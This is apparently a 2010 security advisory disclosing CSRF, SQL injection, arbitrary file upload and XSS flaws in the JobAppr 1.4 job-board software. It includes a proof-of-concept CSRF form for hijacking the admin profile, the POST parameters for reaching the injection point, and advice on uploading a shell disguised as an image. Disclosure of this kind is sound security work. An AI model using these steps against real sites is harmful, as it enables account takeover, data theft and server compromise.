======================================= JobAppr <= 1.4 Multiple Vulnerabilities ======================================= Author___: giudinvx Email____: <giudinvx[at]gmail[dot]com> Date_____: 21/12/2010 Site_____: http://www.giudinvx.altervista.org/ -------------------------------------------------------- Application Info: JobAppr is a simple job board software for every category Version 1.4http://www.jobappr.com/ -------------------------------------------------------- [+] CSRF <form action="[jobappr_path]/admin/profile.php" method="post" id="account"> <input type="hidden" value="1" name="role_id"> <input type="text" value="" name="first_name"><em>First</em><br/> <input type="text" value="" name="last_name"><em>Last</em><br/> <input type="text" value="" name="email"><em>email</em><br/> <input type="text" value="" name="username"><em>username</em><br/> <input type="password" value="" name="password"><em>Password</em><br/> <input type="password" value="" name="password_confirm"><em>Confirm password</em><br/> <input type="submit" value="Update Your Profile" name="submit" class="submit"></td> </form> [+] Sql Injection Vulnerable code: post.php 91: mysql_query("UPDATE ". TB_JOBS ." SET logo='".clean($logo_url)."' WHERE form_id='".$_POST['form_id']."'"); For exploit this vulnerability you have need to set up some POST variables. title=1&categor=1&location=1&description=1&apply=1&company=1&website=www.localhost.com&email=localhost@www.com&highlight=1&form_id=[Sql_Injection_here] [+] Arbitrary File Upload Vulnerable code: post.php 48: $ext = strtolower(substr($_FILES["logo"]["name"], strrpos($_FILES["logo"]["name"], '.') + 1)); 50: # check to see if it's an image file based on it's extention 51: if ($ext != 'jpg' && $ext != 'jpeg' && $ext != 'gif' && $ext != 'png' ) { 52: $errors = true; $err_logo = 'Invalid logo file type (jpg, gif, png accepted)<br />'; You can upload a shell with an extension jpg,jpeg,gif or png, and after find them in /logos path. Also for this exploit this vulnerability have need to set up POST vars above. [+] XSS post.php page have also this vulnerability, you can exploit this with above post vars.